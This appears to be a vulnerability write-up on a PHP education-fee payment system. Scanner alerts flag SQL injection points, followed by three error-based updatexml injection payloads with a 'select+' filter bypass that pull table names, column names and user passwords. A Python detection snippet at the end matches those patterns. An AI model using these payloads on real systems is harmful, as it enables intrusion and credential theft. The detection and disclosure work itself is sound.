**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/index.php:1:2895 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? conntable(); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/install/index.php:1:5068 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? ig(); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/install/index.php:1:5122 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? se(); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/install/index.php:1:5169 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/doajax.php:1:497 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/doedit.php:1:631 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/douser.php:1:4936 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/duajax.php:1:293 is probably vulnerable.(Trace Graph at )**
**2020-05-12 17:47:04 [ALRT] [php-parser/instance/condition_slover.go:41] [*] Found <? $__ANY__->getRow($__ARG__); at /Users/maple/Downloads/php-test2/1/php简易扫码付教育收费系统 v1.0/user/index.php:1:425 is probably vulnerable.(Trace Graph at )**
Insert a + sign after select as the bypass, and construct the payload: `1111'or updatexml(1,concat(0x02,(select+ group_concat(table_name) from information_schema.tables where table_schema='phppay'),0x02),1)-- +`
The SQL statement executes successfully and returns the table names of the database.
In the same way, construct the payload: `1111'or updatexml(1,concat(0x02,(select+ group_concat(column_name) from information_schema.columns where table_name='user' and table_schema='phppay'),0x02),1)-- +`
The SQL statement executes successfully and returns the column names of the user table.
In the same way, construct the payload: `1111'or updatexml(1,concat(0x02,(select+ group_concat(wi,0x02,password) from phppay.user limit 0,1),0x02),1)-- +`
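A detection-side check for the payloads above, added here as an example and not part of the original write-up: it normalizes a request line and flags the error-based `updatexml` / `information_schema` pattern no matter what character follows `select`. The request path, the `q` parameter, the rule names and the threshold are assumptions, the sample lines are constructed, and `extractvalue` is included as the sibling MySQL XML function.

```python
import re
from urllib.parse import unquote_plus

# Rule names are hypothetical labels chosen for this example.
RULES = {
    "xml_error_function": re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "schema_enumeration": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
    "subquery_select": re.compile(r"\(\s*select\b"),
    "quote_then_boolean": re.compile(r"'\s*(?:or|and)\b"),
}


def normalize(raw):
    """Decode up to two layers of URL encoding, then fold whitespace and case."""
    text = raw
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text).lower()


def match_rules(raw):
    """Return the names of all rules that match the normalized input."""
    text = normalize(raw)
    return [name for name, rx in RULES.items() if rx.search(text)]


def is_suspicious(raw, threshold=2):
    """Flag only when several independent indicators agree (threshold is an assumption)."""
    return len(match_rules(raw)) >= threshold


# Constructed sample request lines; path and parameter name are placeholders.
SAMPLE_REQUESTS = [
    "GET /app/item.php?q=1111 HTTP/1.1",
    "GET /app/item.php?q=please+select+a+course HTTP/1.1",
    "GET /app/item.php?q=1111%27or+updatexml(1,concat(0x02,(select%2B+group_concat(table_name)"
    "+from+information_schema.tables+where+table_schema=%27phppay%27),0x02),1)--+%2B HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(is_suspicious(line), match_rules(line))
```

Matching on `\(\s*select\b` and on the function names rather than on `select` followed by a space is what keeps the `select+` form from slipping past the rules.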